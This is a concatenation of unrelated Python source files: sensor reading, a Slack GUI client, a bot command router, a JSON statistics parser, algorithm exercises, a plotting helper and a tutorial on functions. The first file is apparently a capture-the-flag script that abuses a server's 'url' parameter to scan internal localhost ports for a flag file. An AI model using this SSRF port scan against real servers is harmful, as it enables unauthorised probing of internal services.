995,066 | d7d5f3532d0f4c70c77606c64877313e0d432137 | import requests
from bs4 import BeautifulSoup
class Solution:
    """POSTs a 'url' parameter to a target endpoint and inspects the
    resulting page for the first embedded image source."""

    def __init__(self):
        self.req = requests.session()
        self.url = ""  # server url include port
        self.res = ""

    def sendP(self, data):
        # Remember the latest response so checkSuc() can inspect it.
        self.res = self.req.post(url=self.url, data=data)

    def checkSuc(self, res):
        # Only a 200 response counts as a hit; return the first <img> src
        # found in the page, otherwise False.
        if res.status_code != 200:
            return False
        page = BeautifulSoup(res.text, "html.parser")
        images = page.select('img')
        return images[0]['src']
if __name__ == '__main__':
    sol = Solution()
    # Baseline request: fetch the flag path on the known port and record
    # the image payload it yields.
    url = "http://127.1:1500/app/flag.txt"
    sol.sendP({'url':url})
    out = sol.checkSuc(sol.res)
    print(out)
    spec = out
    # Scan ports 1500-1800; the first response that differs from the
    # baseline marks the internal service being probed.
    for i in range(1500, 1801):
        url = "http://127.1:"+str(i)+"/app/flag.txt"
        sol.sendP({'url':url})
        print(url)
        out = sol.checkSuc(sol.res)
        if spec != out:
            print('find!!\nPORT: ' + str(i))
            break
|
995,067 | 47d7f20548a40f5b5de3950ec22ca17a28346dea | # BeagleBone Black Health Sensors
# Autores: Mario Baldini, Joao Baggio, Raimes Moraes
import smbus
from time import sleep
import sys
import driver_adxl345_bus1 as ADXL345_bus1
import driver_adxl345_bus2 as ADXL345_bus2
## BEGIN
adx1 = ADXL345_bus1.new(1, 0x1D) #adxl345_bus1_add53
adx2 = ADXL345_bus1.new(1, 0x53) #adxl345_bus1_add53
adx3 = ADXL345_bus2.new(2, 0x1D) #adxl345_bus1_add53
adx4 = ADXL345_bus2.new(2, 0x53) #adxl345_bus1_add53
print "Column 1-3:\tADXL 345, I2C Bus: 1, Address 0x53; Format: x,y,z; +/-0.000 G"
print "Column 4-6:\tADXL 345, I2C Bus: 1, Address 0xXX; Format: x,y,z; +/-0.000 G"
print "Column 7-9:\tADXL 345, I2C Bus: 2, Address 0x53; Format: x,y,z; +/-0.000 G"
print "Column 10-12:\tADXL 345, I2C Bus: 2, Address 0xXX; Format: x,y,z; +/-0.000 G"
axes1 = { 'x':0 , 'y':0, 'z':0 }
axes2 = { 'x':0 , 'y':0, 'z':0 }
axes3 = { 'x':0 , 'y':0, 'z':0 }
axes4 = { 'x':0 , 'y':0, 'z':0 }
while (True):
# print "%.3f" % ( axes['x'] ), "%.3f" % ( axes['y'] ), "%.3f" % ( axes['z'] )
#axes1 = adx1.getAxes(True)
axes1 = adx1.getAxes(True)
axes2 = adx2.getAxes(True)
axes3 = adx3.getAxes(True)
axes4 = adx4.getAxes(True)
sys.stdout.write("%.3f," % ( axes1['x'] ))
sys.stdout.write("%.3f," % ( axes1['y'] ))
sys.stdout.write("%.3f," % ( axes1['z'] ))
sys.stdout.write("\t")
sys.stdout.write("%.3f," % ( axes2['x'] ))
sys.stdout.write("%.3f," % ( axes2['y'] ))
sys.stdout.write("%.3f," % ( axes2['z'] ))
sys.stdout.write("\t")
sys.stdout.write("%.3f," % ( axes3['x'] ))
sys.stdout.write("%.3f," % ( axes3['y'] ))
sys.stdout.write("%.3f," % ( axes3['z'] ))
sys.stdout.write("\t")
sys.stdout.write("%.3f," % ( axes4['x'] ))
sys.stdout.write("%.3f," % ( axes4['y'] ))
sys.stdout.write("%.3f," % ( axes4['z'] ))
sys.stdout.write("\n")
sys.stdout.flush()
sleep (0.150) # ms
|
995,068 | f9090a37c3b354a84d7d0678a47dd0ae63513cb2 | # -*- coding:utf-8 -*-
from sys import argv
import requests
EXAMPLE="""
Eg:python test_argv.py http://www.baidu.com
"""
# Require exactly one URL argument (Python 2 script).
if len(argv) !=2:
    print EXAMPLE
    exit()
script_name,url=argv
# Default to plain HTTP when no scheme was given.
if url[0:4] !="http":
    url=r"http://"+url
r=requests.get(url)
print u"接口地址:"+url
print u"状态码:"+str(r.status_code)
print "headers:"
for key,value in r.headers.items():
    print key,value
|
995,069 | 14163e7316cf86d61862e81440723eb764eb6263 | #!/usr/bin/env python3
import asyncio
import os
import re
import sys
from PyQt5 import QtWidgets
from quamash import QEventLoop
from slack import RTMClient
from slack import WebClient
from MainWindow import Ui_PyQT5SlackClient
# import logging
# logging.basicConfig(level=logging.DEBUG)
slack_api_token = os.environ["SLACK_API_TOKEN"]
slack_bot_token = os.environ["SLACK_BOT_TOKEN"]
class MainWindow(QtWidgets.QMainWindow, Ui_PyQT5SlackClient):
def __init__(self, *args, web_client=None, rtm_client=None, **kwargs):
super().__init__()
self.web_client = web_client
self.rtm_client = rtm_client
self.setupUi(self)
self.chan_list: list = []
self.chan_name_list: list = []
self.pushButton.clicked.connect(self.button_click_send_message)
self.pushButton.setEnabled(False)
self.listWidget.itemClicked.connect(self.channel_item_clicked)
self.current_channel_id: str = ""
self.user_info_cache = {}
self.bots_info_cache = {}
loop.create_task(self.get_conversation_list())
loop.create_task(self.rtm_main())
async def rtm_main(self):
await asyncio.sleep(1)
await rtm_client.start()
@RTMClient.run_on(event="message")
async def message_received(**payload):
data = payload['data']
user_id = data['user']
content = data['text']
await mainWindow.append_message_to_chat(user_id=user_id, content=content)
def button_click_send_message(self) -> None:
message = self.textEdit.toPlainText()
channel = self.current_channel_id
loop.create_task(self.send_message_async(channel=channel,
message=message))
self.textEdit.clear()
async def send_message_async(self, channel: str, message: str) -> None:
await self.web_client.chat_postMessage(channel=channel, text=message)
async def get_history(self, chan_id):
self.textBrowser.clear()
history = await self.web_client.conversations_history(channel=chan_id)
history_messages = history['messages']
history_messages.reverse()
for message in history_messages:
if 'type' in message.keys():
if 'subtype' in message.keys():
if message['subtype'] == 'bot_message':
# print("processing bot message: {}".format(message))
if 'username' in message.keys():
content: str = message['username'] + ": " + message['text']
else:
content = message['text']
if 'attachments' in message.keys():
for attachment in message['attachments']:
if 'fallback' in attachment.keys():
content = content + attachment['fallback']
user_id = message['bot_id']
await self.append_message_to_chat(content=content,
user_id=user_id)
# else:
# print("unhandled subtype type: {}".format(message))
if 'user' in message.keys():
# print("processing message: {}".format(message))
content = message['text']
user_id = message['user']
await self.append_message_to_chat(content=content, user_id=user_id)
else:
print("unhandled message type: {}".format(message))
async def append_message_to_chat(self, content, user_id):
if re.match("^U.*", user_id, flags=re.IGNORECASE):
user_real_name = await self.get_user_real_name(user_id=user_id)
else:
user_real_name = await self.get_bots_real_name(bot_id=user_id)
if "<@{}>".format(user_id) in content:
content = content.replace("<@{}>".format(user_id), user_real_name)
else:
for at_user in re.findall(r'<@U.*?>', content):
at_user_id = at_user.replace('<@', '').replace('>', '')
at_user_name = await self.get_user_real_name(user_id=at_user_id)
content = content.replace(
at_user, "@" + at_user_name)
content = "{}: {}".format(user_real_name, content)
self.textBrowser.append(content)
async def get_user_real_name(self, user_id):
user_info = await self.get_user_info(user_id=user_id)
if "profile" in user_info.keys():
return user_info['profile']['real_name']
elif "real_name" in user_info.keys():
return user_info['real_name']
else:
print("Failed to get real name: {}".format(user_info))
return "Unknown User"
async def get_bots_real_name(self, bot_id):
# print("getting bot info: {}".format(bot_id))
bots_info = await self.get_bots_info(bot_id=bot_id)
# print("bots info: {}".format(bots_info))
if 'user_id' in bots_info['bot'].keys():
user_id = bots_info['bot']['user_id']
bot_user_name = await self.get_user_real_name(user_id=user_id)
return bot_user_name
elif 'name' in bots_info['bot'].keys():
return bots_info['bot']['name']
else:
print("Failed to get bot name: {}".format(bot_id))
return "unknown bot user"
async def get_user_info(self, user_id):
if user_id not in self.user_info_cache:
user_info_resp = await self.web_client.users_info(user=user_id)
self.user_info_cache[user_id] = user_info_resp['user']
return self.user_info_cache[user_id]
async def get_bots_info(self, bot_id):
if bot_id not in self.bots_info_cache:
bots_info_resp = await self.web_client.bots_info(bot=bot_id)
# print("raw bot info: {}".format(bots_info_resp))
self.bots_info_cache[bot_id] = bots_info_resp
return self.bots_info_cache[bot_id]
async def get_conversation_list(self):
conversation_list = await self.web_client.conversations_list(exclude_archived=1)
channels = conversation_list['channels']
self.chan_list = channels
self.listWidget.clear()
for chan in channels:
if chan['is_member']:
self.chan_name_list.append(str(chan['name']))
self.chan_name_list.sort()
for name in self.chan_name_list:
self.listWidget.addItem(name)
    def channel_item_clicked(self, item) -> None:
        """Handle a click on a channel name: select it and load its history."""
        chan_name = item.text()
        # Find the raw channel record whose name matches the clicked item.
        chan_info_list = [element for element in self.chan_list
                          if element['name'] == chan_name]
        chan_info = chan_info_list[0]
        self.current_channel_id = chan_info['id']
        self.pushButton.setEnabled(True)
        # `loop` is the module-level event loop created at startup.
        loop.create_task(self.get_history(self.current_channel_id))
# --- Application bootstrap -------------------------------------------------
app = QtWidgets.QApplication(sys.argv)
# QEventLoop bridges Qt and asyncio (presumably quamash/qasync -- the import
# is not visible in this chunk; confirm).
loop = QEventLoop(app)
asyncio.set_event_loop(loop)
# Web API client (REST calls) and RTM client (realtime events) share the loop.
web_client = WebClient(token=slack_api_token, run_async=True, loop=loop)
rtm_client = RTMClient(token=slack_bot_token, connect_method='rtm.start',
                       run_async=True, loop=loop)
future = rtm_client.start()
with loop:
    mainWindow = MainWindow(web_client=web_client, rtm_client=rtm_client)
    mainWindow.show()
    # Runs until the window/loop is closed.
    loop.run_forever()
|
995,070 | 8de74df84dd61c8a8e593dc7cac53525e85183ca | from commands.help import HelpCommand
from commands.toons import ToonsCommand
from commands.ships import ShipsCommand
from commands.members import MembersCommand
from commands.guild_member import GuildMemberCommand
from commands.member_toon import MemberToonCommand
from commands.member_ship import MemberShipCommand
from commands.zetas import ZetasCommand
from commands.cls_ready import CLSReadyCommand
from commands.jtr_ready import JTRReadyCommand
from commands.thrawn_ready import ThrawnReadyCommand
from commands.lstbplatoons import LSTBPlatoonsCommand
class CommandInterpreter(object):
    """Resolve command names to their handler objects.

    Unknown command names fall back to the ``help`` handler so callers
    always receive something they can invoke.
    """

    def __init__(self):
        self.commands = {}
        self.populate_commands()

    def populate_commands(self):
        """Build the registry of available commands, keyed by name."""
        handler_classes = {
            'help': HelpCommand,
            'toons': ToonsCommand,
            'ships': ShipsCommand,
            'members': MembersCommand,
            'guild-member': GuildMemberCommand,
            'member-toon': MemberToonCommand,
            'member-ship': MemberShipCommand,
            'zetas': ZetasCommand,
            'cls-ready': CLSReadyCommand,
            'jtr-ready': JTRReadyCommand,
            'thrawn-ready': ThrawnReadyCommand,
            'lstbplatoons': LSTBPlatoonsCommand,
        }
        # Each handler is constructed with its own registry name.
        for name, handler_cls in handler_classes.items():
            self.commands[name] = handler_cls(name)

    def interpret(self, name):
        """Return the handler registered under *name*, or the help handler."""
        if name in self.commands:
            return self.commands[name]
        return self.commands['help']
|
995,071 | e5d422863f485bd97b05064fee917231e296c4e0 | import argparse
import sys
import os
import logging
import ConfigParser
import json
import copy
WORKDIR = os.path.realpath(os.path.dirname(sys.argv[0]))
def init_logger(log_file_name, log_base_path=None, log_level=None,
                logger_name=None, print_to_console=None):
    """Create and configure a file-backed logger.

    Defaults mirror the original behaviour: log file under ``\\var\\log``,
    level ``logging.INFO``, logger name ``'default'``, no console echo.
    Returns the configured ``logging.Logger`` instance.
    """
    log_base_path = r"\var\log" if log_base_path is None else log_base_path
    log_level = logging.INFO if log_level is None else log_level
    logger_name = 'default' if logger_name is None else logger_name
    print_to_console = False if print_to_console is None else print_to_console

    formatter = logging.Formatter(
        '%(asctime)s %(levelname)s\t%(module)s:%(lineno)d: %(message)s')
    file_handler = logging.FileHandler(os.path.join(log_base_path, log_file_name))
    file_handler.setFormatter(formatter)

    logger = logging.getLogger(logger_name)
    logger.addHandler(file_handler)
    if print_to_console:
        # Echo everything to stdout as well; the handler level is DEBUG so
        # the logger's own level is what actually filters.
        console_handler = logging.StreamHandler(sys.stdout)
        console_handler.setLevel(logging.DEBUG)
        console_handler.setFormatter(formatter)
        logger.addHandler(console_handler)
    logger.setLevel(log_level)
    return logger
def parse_cmd_arguments(custom_args):
    """Parse known command-line options; returns the argparse namespace."""
    parser = argparse.ArgumentParser(description="")
    parser.add_argument("-json_db", default="json_db.json",
                        help="json db input for parser")
    # Unknown arguments are tolerated and simply discarded.
    parsed, _unknown = parser.parse_known_args(custom_args)
    return parsed
def parse_input_arguments(custom_args):
    """
    parse_input_arguments() -> config_dict: [dict]

    Merge optional .conf-file sections (a file named after this script,
    located next to it) with the parsed command-line arguments.
    """
    try:
        config = ConfigParser.ConfigParser()
        # Config file shares the script's basename: foo.py -> foo.conf.
        conf_file = os.path.basename(__file__).split('.py')[0] + '.conf'
        conf_file = os.path.join(WORKDIR, conf_file)
        config.read(conf_file)
        # Raw section dict of the parsed config (Python 2 ConfigParser).
        conf_dict = config.__dict__['_sections'].copy()
    except Exception, e:
        # Best effort: a missing/broken config just means empty defaults.
        conf_dict = {}
        print "Config_dict wasn't found, running without it \n Exception:%s" % e
    args = parse_cmd_arguments(custom_args)
    conf_dict['run'] = {}
    conf_dict['cmd'] = {}
    conf_dict['cmd']['json_db'] = args.json_db
    # NOTE(review): LOGGER is a module global assigned in __main__ -- this
    # raises NameError if the module is imported without running as a script.
    conf_dict['LOGGER'] = LOGGER
    return conf_dict
def json_2_dict(conf_dict):
    """Load the JSON database named in ``conf_dict['cmd']['json_db']``.

    Returns the parsed JSON content (typically a dict).
    """
    # Context manager closes the handle even on a parse error; the original
    # opened the file and never closed it.
    with open(conf_dict['cmd']['json_db']) as json_file:
        return json.load(json_file)
def db_parser(json_db):
    """Aggregate per-file-type statistics from the loaded JSON db.

    Returns ``{file_type: {'sha_list': [...], 'file_count': int,
    'oldest': date-or-None}}`` for the types exe/pdf/py, counting each
    sha256 at most once per type and tracking the oldest entry date.
    """
    file_list = json_db['files']
    adict = {'sha_list': [], 'file_count': 0, 'oldest': None}
    # deepcopy so each file type gets its own independent mutable state.
    result_dict = {'exe': copy.deepcopy(adict), 'pdf': copy.deepcopy(adict),
                   'py': copy.deepcopy(adict)}
    for i, afile in enumerate(file_list):
        file_type = afile['file_type']
        file_sha = afile['sha256']
        date = afile['date']
        # Count each distinct sha256 only once per type.
        if file_sha not in result_dict[file_type]['sha_list']:
            result_dict[file_type]['sha_list'].append(file_sha)
            result_dict[file_type]['file_count'] += 1
            if result_dict[file_type]['oldest']:
                if date < result_dict[file_type]['oldest']:
                    result_dict[file_type]['oldest'] = date
            else:
                result_dict[file_type]['oldest'] = date
    # NOTE: iteritems() is Python 2 only.
    for file_type, values in result_dict.iteritems():
        pline = "\tfiles_type: %s\toccurrences: %s\toldest_entry: %s" \
                % (file_type, values['file_count'], values['oldest'])
        LOGGER.info(pline)
    return result_dict
def main(custom_args=None):
    """Program entry point; returns 0 on success, 1 on bad configuration."""
    conf_dict = parse_input_arguments(custom_args)
    if not conf_dict:
        return 1
    # Load the raw JSON db, then reduce it to per-file-type statistics.
    conf_dict['json_db'] = json_2_dict(conf_dict)
    conf_dict['result'] = db_parser(conf_dict['json_db'])
    return 0
if __name__ == '__main__':
    # Log next to the script itself and mirror output to stdout.
    LOGGER = init_logger(os.path.basename(__file__) + '.log',
                         log_base_path='%s' % WORKDIR,
                         print_to_console=True, log_level=logging.DEBUG)
    LOGGER.info('start' + os.path.basename(__file__))
    exit_status = main()
    LOGGER.info('exit status = %s' % exit_status)
    LOGGER.info('end' + os.path.basename(__file__))
    sys.exit(exit_status)
995,072 | 181f7f37abaf2506bb08747bd42b5c75b9f79856 | """
Given a non-negative integer num, Return its encoding string.
The encoding is done by converting the integer to a string using a secret function that you should deduce from the following table:
Example 1:
Input: num = 23
Output: "1000"
Example 2:
Input: num = 107
Output: "101100"
Constraints:
0 <= num <= 10^9
"""
# 000, 001,010,011,100,101,110,111,0000,0001,0010,0011,0100,0101,0110,0111,1000
# convert the num + 1 into binary and drop the most significant digit
class Solution:
    def encode(self, num: int) -> str:
        """Encode *num* by writing num + 1 in binary and dropping the
        most significant bit (the pattern deduced from the table)."""
        if num == 0:
            return ""
        # bin() yields '0b1...'; slicing from index 3 drops '0b' and the
        # leading 1 bit in one step.
        return bin(num + 1)[3:]
|
995,073 | 9e1e30fda2373e7eb0a3fc2d4f8428cf5f42fad8 | from case.interfacetest import InterfaceTestCase
if __name__ == '__main__':
app = InterfaceTestCase()
app.runAllCase("xd") |
995,074 | c0988a8a6286437ad6d1846cbe4af286c06e92b6 | def binarySearch(target):
left, right = 0, len(nums) - 1
while left < right:
mid = left + (right - left) // 2
if target <= nums[mid]:
right = mid
else:
left = mid + 1
return left
1. if the array has duplicates, this will return the first occurrence of the target
[9,9,9,9] -> ans will be 0
2. if target > nums[-1], it will return last index
3. if target < nums[0], it will return 0
4. if you find a match, left==right==mid
5. if you don't find a match, it will return insert location
|
995,075 | 6f4e560e6e7702eaab69d5692558b31d3581889a | #Timedelta function demo
from datetime import datetime, timedelta
#timedelta has 3 attributes
print("Max:", timedelta.max) #the most positive timedelta object, timedelta(days=999999999,hours=23),minues=59,seconds=59,microseconds=999999)
print("Min:", timedelta.min) #the most negative timedelta bject,timedelta(-999999999)
print("Resolution:", timedelta.resolution) #the smallest psossible differnce between non-equal timedelta objects, timedelta(microseconds=1)
#using current time
current_date_time=datetime.now()
#printing initial date
print("initial_date", current_date_time)
#calculating future dates
#for one year
future_date_after_1yr=current_date_time + timedelta(days=365)
#for 4 days and time
future_date_after_4days=current_date_time + timedelta(days=4, hours=5, minutes=4, seconds=54)
# print calculated furture dates
print("future date after 1 year", future_date_after_1yr)
print("future date after 4 days", future_date_after_4days)
print("Type:", type(future_date_after_4days))
#convert string
future_date_after_1yr_str=str(future_date_after_1yr)
future_date_after_4days_str=str(future_date_after_4days)
print("future date after 1 year", future_date_after_1yr_str)
print("future date after 4 days", future_date_after_4days_str)
print("Type:", type(future_date_after_4days_str))
|
995,076 | f47fec488fb6878c7723ad88505ea1f23db7b97b | """
Module description ...
Reference:
- Surename1, Forename1 Initials., Surename2, Forename2 Initials, YEAR. Publication/Book title
Publisher, Number(Volume No), pp.142-161.
"""
import numpy as np
import matplotlib.pyplot as plt
def draw_lagrangian_descriptor(LD, LD_type, grid_parameters, tau, p_value, norm = True, colormap_name='bone', colormap_mode=1):
    """
    Draws a Lagrangian descriptor contour plot and a contour plot showing the magnitude of its gradient field.

    Parameters
    ----------
    LD : ndarray, shape(n, )
        Array of Lagrangian Descriptor values.
    LD_type : str
        Type of LD to plot. Options: 'forward', 'backward', 'total'.
    grid_parameters : list of 3-tuples of floats, or dict
        Limits and size of mesh per axis. A dict (n-DoF systems) must
        provide 'slice_parameters' (the 2-D slice grid) and 'dims_slice'
        (0/1 flags selecting the two plotted axes).
    tau : float
        Upper limit of integration.
    p_value : float
        Exponent in Lagrangian descriptor definition.
    norm : bool, optional
        True normalises LD values.
    colormap_name : str, optional
        Name of matplotlib colormap for plot.
    colormap_mode : int, optional
        1 -> colour limits span the full LD range;
        2 -> colour limits span (mean - std) .. max.
    Returns
    -------
    Nothing.
    """
    if type(grid_parameters) == dict:
        #n-DoF systems
        slice_parameters = grid_parameters['slice_parameters'] # 2n-D grid
        dims_slice = np.array(grid_parameters['dims_slice'])
        slice_axes_labels = np.array(['$x$','$y$','$p_x$','$p_y$'])
        # Keep only the labels of the two axes selected for the slice.
        slice_axes_labels = slice_axes_labels[dims_slice==1]
    else:
        #1-DoF systems
        slice_parameters = grid_parameters # 2-D grid
        slice_axes_labels = ['$x$', '$p_x$']
    ax1_min, ax1_max, N1 = slice_parameters[0]
    ax2_min, ax2_max, N2 = slice_parameters[1]
    if norm:
        # Rescale LD into [0, 1] using nan-aware min/max.
        LD = LD - np.nanmin(LD) # Scale LD output
        LD = LD / np.nanmax(LD) # Scale LD output
    # Plot LDs
    fig, (ax0, ax1) = plt.subplots(1, 2, figsize=(7.5,3), dpi=200)
    points_ax1 = np.linspace(ax1_min, ax1_max, N1)
    points_ax2 = np.linspace(ax2_min, ax2_max, N2)
    if colormap_mode == 1:
        vmin, vmax = LD.min(), LD.max()
    elif colormap_mode == 2:
        vmin = LD.mean()-LD.std()
        vmax = LD.max()
    con0 = ax0.contourf(points_ax1, points_ax2, LD, cmap=colormap_name, vmin=vmin, vmax=vmax, levels=200)
    # Customise appearance: pick a descriptor name for the title.
    if p_value == 2:
        str_method = 'arclength - '
    elif p_value >= 1:
        str_method = r'p-norm $(p={})$'.format(p_value)
    elif p_value == 0:
        str_method = 'action-based'
    elif p_value < 1:
        str_method = r'LD$_p$ $(p={})$'.format(p_value)
    t_final=abs(tau)
    if LD_type == 'forward':
        string_title = r'Forward LD {}, $\tau={}$'.format(str_method,t_final)
    elif LD_type == 'backward':
        string_title = r'Backward LD {}, $\tau={}$'.format(str_method,t_final)
    elif LD_type == 'total':
        string_title = r'Total LD {}, $\tau={}$'.format(str_method,t_final)
    else:
        string_title = ''
        print('Incorrect "LD_type". Valid options: forward, backward, total. Plot will appear without title')
    fig.suptitle(string_title, fontsize=14, y=1.04)
    ax0.set_title('LD values')
    ax0.set_xlabel(slice_axes_labels[0])
    ax0.set_ylabel(slice_axes_labels[1])
    ticks_LD = np.linspace(np.nanmin(LD), np.nanmax(LD), 11)
    fig.colorbar(con0, ax=ax0, ticks=ticks_LD, format='%.2f')
    # NOTE(review): the gradient spacing 0.05 is hard-coded and may not match
    # the actual grid spacing derived from slice_parameters -- confirm.
    gradient_x, gradient_y = np.gradient( LD, 0.05, 0.05)
    gradient_magnitude = np.sqrt(gradient_x**2 + gradient_y**2)
    # Normalise the gradient field to [0, 1] for plotting.
    gradient_magnitude = gradient_magnitude/gradient_magnitude.max()
    con1 = ax1.contourf(points_ax1, points_ax2, gradient_magnitude, cmap='Reds', levels=200)
    ax1.set_title('LD gradient magnitude')
    ax1.set_xlabel(slice_axes_labels[0])
    ax1.label_outer()
    ticks_gradient = np.linspace(np.nanmin(gradient_magnitude), np.nanmax(gradient_magnitude), 11)
    fig.colorbar(con1, ax=ax1, ticks=ticks_gradient, format='%.2f')
    plt.show()
__author__ = 'Broncio Aguilar-Sanjuan, Victor-Jose Garcia-Garrido, Vladimir Krajnak'
__status__ = 'Development'
|
995,077 | e3e15e2e47e5dba468c4bc5080a90c81268a8366 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# call functions
abs(-100)
max(1, 2)
int('123')
int(12.34)
float('12.34')
str(100)
bool(1)
bool(-1)
bool(0)
bool('')
bool(None)
a = abs
a(-1)
# define a function
def my_abs(x):
    """Return the absolute value of x (no argument-type checking)."""
    return x if x >= 0 else -x
my_abs(-0.5)
# empty function (pass for do nothing)
def nop():
pass
age = 0
if age >= 18:
pass
# check the parameters
abs('A')
my_abs('A')
my_abs(1, 2)
def my_abs(x):
    """Absolute value with an explicit argument-type check.

    Raises TypeError for non-numeric input instead of failing later.
    """
    if not isinstance(x, (int, float)):
        raise TypeError('bad openrand type')
    return x if x >= 0 else -x
my_abs('A')
# function return two values
import math
def move(x, y, step, angle=0):
    """Return the point reached from (x, y) after moving *step* units at
    *angle* radians (y decreases with positive sin, screen-style)."""
    return x + step * math.cos(angle), y - step * math.sin(angle)
x, y = move(100, 100, 60, math.pi/6)
print(x, y)
r = move(100, 100, 60, math.pi/6)
print(r) # the return of the move is actually a tuple
# using default parameter
def power(x, n=2):
    """Return x**n for non-negative integer n (default: square)."""
    result = 1
    for _ in range(n):
        result *= x
    return result
power(3, 0)
power(3)
# use None as the default parameter
def add_end(L=[]):
    # Deliberate anti-pattern demo: the default list is created once at
    # definition time and shared across calls, so repeated add_end() calls
    # keep appending to the same list (see the fixed version below).
    L.append('END')
    return L
add_end([1, 3, 4])
add_end()
add_end()
add_end()
def add_end(L=None):
    """Append 'END' to *L*; a fresh list is used when *L* is omitted."""
    items = [] if L is None else L
    items.append('END')
    return items
add_end([1, 3, 4])
add_end()
add_end()
add_end()
# using changeable parameter
def calc(numbers):
    """Return the sum of squares of the values in *numbers* (an iterable)."""
    return sum(v ** 2 for v in numbers)
calc([2, 3, 4])
calc(2, 3, 4)
def calc(*numbers):
    """Return the sum of squares of all positional arguments."""
    return sum(v ** 2 for v in numbers)
calc(2, 3, 4)
calc([2, 3, 4])
calc(*[2, 3, 4]) # use * to return all the element of a list
# using key word parameters
def person(name, age, **kw):
print('name:', name)
print('age:', age)
print('others:', kw)
person('Bob', 14)
person('Bob', 14, city='Beijing')
person('Ken', 26, city='HOng Kong', job="Engineer")
extra = {'city': 'Beijing', 'job': 'Engineer'}
person('Jack', 20, city=extra['city'], job=extra['job'])
person('Jack', 20, **extra)
# name the key word parameter
person('Ken', 26, city='Hong Kong', job="Engineer", addr='Wahahahha')
def person(name, age, *, city='Beijing', job):
print('name:', name)
print('age:', age)
print('city:', city)
print('job:', job)
person('Ken', 26, city='Hong Kong', job="Engineer")
person('Ken', 26, job="Engineer")
person('Ken', 26)
person('Ken', 26, city='Hong Kong', job="Engineer", addr='Wahahahha')
person('Ken', 26, 'Hong Kong', "Engineer")
# comparison
# *args is a changeable parameter, it receives a tuple. **kw is a keyword parameter, it receives a dict
def f1(a, b, c=0, *args, **kw):
print('a:', a)
print('b:', b)
print('c:', c)
print('args:', args)
print('kw:', kw)
f1(1, 2)
f1(1, 2, 3)
f1(1, 2, 3, 4)
f1(1, 2, 3, 4, 5)
f1(1, 2, 3, [4, 5, 6])
f1(1, 2, 3, *[4, 5, 6])
f1(1, 2, 3, *[4, 5, 6], 7)
f1(1, 2, 3, 4, kw1=3)
f1(1, 2, 3, 4, kw1=3, kw2=4)
f1(1, 2, 3, 4, 5, kw1=3, kw2=4)
f1(1, 2, 3, kw1=3, kw2=4)
# kw0 is a named keyword parameter, it receives a dict
def f2(a, b, c=0, *, kw0, **kw):
print('a:', a)
print('b:', b)
print('c:', c)
print('args:', kw0)
print('kw:', kw)
f2(1, 2)
f2(1, 2, kw0=4)
f2(1, 2, 3, kw0=4)
f2(1, 2, 3, kw0=[1, 2])
# f2(1, 2, 3, kw0=*[1, 2])
f2(1, 2, 3, kw0=4, kw1=7)
ARGS1 = (1, 2, 3, 4)
KW1 = {'kw1': 9, 'kw2': 10}
f1(*ARGS1, **KW1)
ARGS2 = (1, 2, 3)
KW2 = {'kw0': 7, 'kw1': 9, 'kw2': 10}
f2(*ARGS2, **KW2)
'''
*args是可变参数,args接收的是一个tuple;
**kw是关键字参数,kw接收的是一个dict。
以及调用函数时如何传入可变参数和关键字参数的语法:
可变参数既可以直接传入:func(1, 2, 3),又可以先组装list或tuple,再通过*args传入:func(*(1, 2, 3));
关键字参数既可以直接传入:func(a=1, b=2),又可以先组装dict,再通过**kw传入:func(**{'a': 1, 'b': 2})。
使用*args和**kw是Python的习惯写法,当然也可以用其他参数名,但最好使用习惯用法。
'''
# recursion function
def fact(n):
    """Return n! computed recursively for n >= 0.

    The original base case only covered n == 1, so fact(0) recursed until
    RecursionError; the guard now covers both 0 and 1.
    """
    if n <= 1:
        return 1
    return n * fact(n - 1)
fact(5)
fact(1000)
def fact(n):
    """Return n! via an accumulator-passing helper (still recursion-bound)."""
    return fact_iter(n, 1)


def fact_iter(num, product):
    """Tail-style factorial helper: fold *num* down to 1 into *product*."""
    return product if num == 1 else fact_iter(num - 1, num * product)
fact(5)
fact(100)
'''
汉诺塔的移动可以用递归函数非常简单地实现。
请编写move(n, a, b, c)函数,它接收参数n,表示3个柱子A、B、C中第1个柱子A的盘子数量,然后打印出把所有盘子从A借助B移动到C的方法,例如:
'''
def move(n, a, b, c):
    """Print the moves that transfer n disks from peg a to peg c via b."""
    if n == 1:
        print(a, '--->', c)
        return
    # Move the top n-1 disks out of the way, shift the largest disk,
    # then bring the n-1 disks back on top of it.
    move(n - 1, a, c, b)
    move(1, a, b, c)
    move(n - 1, b, a, c)
move(3, 'A', 'B', 'C')
'''
calculate a^b
'''
def power(x, n):
    """Return x**n for n >= 0 using exponentiation by squaring."""
    if n == 0:
        return 1
    half = power(x, n // 2)
    squared = half * half
    # Odd exponents need one extra factor of x.
    return squared if n % 2 == 0 else x * squared
power(2, 3)
'''
print every subset of a given set
'''
def print_subset(X, cur=None, index=0):
    """Print every subset of sequence X, one list per line.

    *cur* and *index* are recursion state; callers normally pass X only.
    The mutable default list argument was replaced with a None sentinel so
    top-level calls cannot share state (behaviour is otherwise unchanged,
    since the original appended and popped symmetrically).
    """
    if cur is None:
        cur = []
    if index == len(X):
        print(cur)
        return
    # Branch 1: include X[index]; branch 2: exclude it.
    cur.append(X[index])
    print_subset(X, cur, index+1)
    cur.pop()
    print_subset(X, cur, index+1)
# hand-trace note: X = a b c  (left as a comment -- the bare line was a syntax error)
cur = []
index = 0
print_subset(["A", "B", "C", "D"])
print_subset(["A", "B", "C"])
print_subset(["A", "B"])
print_subset(["A"])
|
995,078 | 6e530c48cd9902189f2bbbb7a98ff652eca2b7e2 | # -*- coding: utf-8 -*-
"""
Created on Sat Jul 04 14:50:28 2015
Given an array S of n integers, are there elements a, b, c in S
such that a + b + c = 0? Find all unique triplets in the array which
gives the sum of zero.
Note:
Elements in a triplet (a,b,c) must be in non-descending order. (ie, a ≤ b ≤ c)
The solution set must not contain duplicate triplets.
For example, given array S = {-1 0 1 2 -1 -4},
A solution set is:
(-1, 0, 1)
(-1, -1, 2)
思路:先sort array, O(nlogn).
然后从左到右看每一个数num[i],找它右边是否有两个数之和为-num[i], O(n2).
注意,重复的不用看了。
Tag: Array, Two Pointers
Similar Problems: (M) Two sum (M) 3Sum Closest (M) 4Sum
@author: Neo
"""
class Solution:
    # @param {integer[]} nums
    # @return {integer[][]}
    def threeSum(self, nums):
        """Return all unique triplets [a, b, c] from nums with a+b+c == 0.

        Sorts the input in place, then for each distinct anchor value scans
        the remainder with two pointers, skipping duplicates on both sides.
        O(n^2) time after the O(n log n) sort.
        """
        nums.sort()
        res = []
        # `range` instead of Python-2-only `xrange`: identical iteration
        # semantics on Python 2, and the code now also runs on Python 3.
